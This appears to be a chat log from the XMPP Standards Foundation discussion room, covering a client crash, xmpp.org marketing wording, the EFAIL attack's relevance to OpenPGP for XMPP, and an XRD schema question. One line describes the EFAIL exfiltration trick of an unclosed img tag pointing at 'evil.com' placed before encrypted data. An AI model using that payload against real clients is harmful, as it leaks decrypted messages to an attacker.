XSF Discussion - 2018-05-16

Wow, Swift just crashed my Pulseaudio :)

and then crashed itself

Looks like one of my local test accounts had a $large number of offline messages

,oO( https://op-co.de/tmp/chatsecure-crash-iphone.mp4 )

Nice :)

It's like winning Solitaire

what

how do a lot of offline messages crash pulseaudio.

jonasw, notification sound. I think it probably tried to play thousands of them at once

and opening a pulseaudio connection for each, I guess, probably by invoking paplay or something. that makes sense.

but still a bug in pulse probably :)

Yeah

> jonasw> but still a bug in pulse probably :)

not sure if lennart would agree

AFAIK lennart isn’t involved with pulse anymore

I'm allergic to notification sounds. Probably forever scarred by how annoying that ICQ oh-oh sound got after a while.

I feel you

Recently I complained about xmpp.org advertising XMPP as "most secure" messaging standard. Some people agreed, that "most secure" is not the most important feature to advertise XMPP with. And some people might even doubt, that XMPP is exceptionally secure :~)

I suggest to replace "most secure" with the word "universal".

Secure in its awesomeness

Yes

that's the idea for me

I believe, that the most important aspect of XMPP compared to other, similar technologies is it's "universal" approach. eXtensible for whatever one likes to do, useful for IoT, WebRTC, and social (below on xmpp.org), etc.

Something that would mean in a way 'the standard'

I like that

The literal battle tested might also not fly well with some people...

The Standard.

Yes.

It's probably fine for it to be bold

"Battle-tested" might also be something to change, true.

What was that saying about how to get replies on the Internet? State something wrong. People will flock to correct you.

debacle: That might actually be true in a literal sense.

Zash: that's the problem

Yes, but do you want to use this use case for the ads? :~)

Pacifists or anti-bellicists might go to Matrix then :~)

I mean I personally don't have issues with that. But advertising oneself as the protocol that is used to kill people (albeit indirectly) is probably not the best idea for some target audience

XEPs are lethal in some way...

XEPs don't kill people. People kill people.

That would make for a better slogan

I raised the tagline at the time. It was a deliberate decision by (then) Board.

Back to my complaint: Who could decide over s/most secure/universal/ on xmpp.org? (Or any other change?)

Board?

Maybe also s/Battle-tested./Secure./ ? ✏

Why not have bold marketing tho?

Bold?

Not everything that's bold is also good or useful. Advertising Conversations as trusted by ISIS and organized crime might be bold but arguably pretty bad marketing

All publicity is good publicity, as they say

The EFFail was no good marketing, neither for PGP nor EFF.

When everyone has forgotten the details, they might remember "PGP". If so, then it was a success.

I should read that paper in depth at some point to evaluate its impact on OpenPGP for XMPP.

If people read the details, they'd see it had nothing to do with pgp in the first place :)

They remember "PGP is dangerous, I must uninstall it and replace with Signal" ✏

vanitasvitae: It wasn't about PGP, it was about MIME and email clients being terrible

Zash, no, it was also about PGP

PGP was just harder to attack

not really, it was an HTML thing, you know, like xhmtl-im

If you put xhtml in your ox one could maybe do something similar

Under some conditions

If you implemted both xhtml and your ox in a bad way that is

daniel, I suspect that XMPP would be vulnerable the same way. You could for example insert references. Or even HTTP-Upload links.

But I have to evaluate that in more depth

If you put [[<img src="http://evil.com/]] followed by PGP-encrypted data it went and did a HTTP query for evil.com/encrypted-secrets-here

Yeah I think you could deliberately Design and implemted ox in a way that is vulnerable. But I think that might be a bit harder. Because unlike the mime parsers it won't mix different parts of the stanza

debacle, make a pull request on Github with your proposed change, and I'm sure everything will follow on from there

MattJ, will do, thanks!

by the look of things, OX puts the stuff that is interpreted as the message payload in an additional element (<signcrypt/> for example), so an attack would be very complicated. Harder than attacking email at least :D

As long as messages are either encrypted or not, it should be fine

who would've though using stricter XML instead of lax HTML would prevent some attacks? /s the same style of attack: https://githubengineering.com/githubs-post-csp-journey/

Nah, who cares, kill XHTML

XHTML is dead, long live tag soup!

yep, that's the effect of this thinking, move fast break things, and XHTML-2 was claimed to be "bad" because it made people watch green screens of death

Nah, XHTML 2 was bad because it fixed stupid early mistakes in HTML

Like a single <h> instead of <h[1-6]>

single <h> is not as easy as it seems: https://jakearchibald.com/2017/do-we-need-a-new-heading-element/

Wiktor, s/green/yellow/ :p

Link Mauve: yes, lol, I've imagined yellow but said green, weird

I miss the good old days when I could link people to https://www.moparisthebest.com/no.html and if they opened it in IE it would blue-screen-of-death their computer

because the img width/height were too large of integers...

deathpic.png, sounds dangerous

This is scary at so many levels.

Why would parsing an HTML integer trigger a kernel panic.

yea everyone thought it was the image, it wasn't, it's an overflow with the tags :)

Link Mauve, right? :)

I want to say it was vulnerable to windows xp sp1, then sp2 fixed it

"vulnerable to windows xp" - isn't that a problem affecting most PCs produced in the last decade?

are there any XSD wizards in here that could tell me if according to this schema if I can have multiple <Property/> elements with the same type? http://docs.oasis-open.org/xri/xrd/v1.0/xrd-1.0.html#element.property

like <Link bla><Property type="something">data1</Property><Property type="something">data2</Property></Link> ?

http://docs.oasis-open.org/xri/xrd/v1.0/xrd-1.0.html#examples.2 has <Property type="http://spec.example.net/version">1.0</Property><Property type="http://spec.example.net/version">2.0</Property>

so I guess the answer is yes? though what does "XRD Examples (Non-Normative)" mean? :)

moparisthebest, I’m rather sure that XSD can’t express such things

thanks jonasw , as an aside you've been doing an exceptional job as editor lately

thanks

only lately, before that it was crap

:D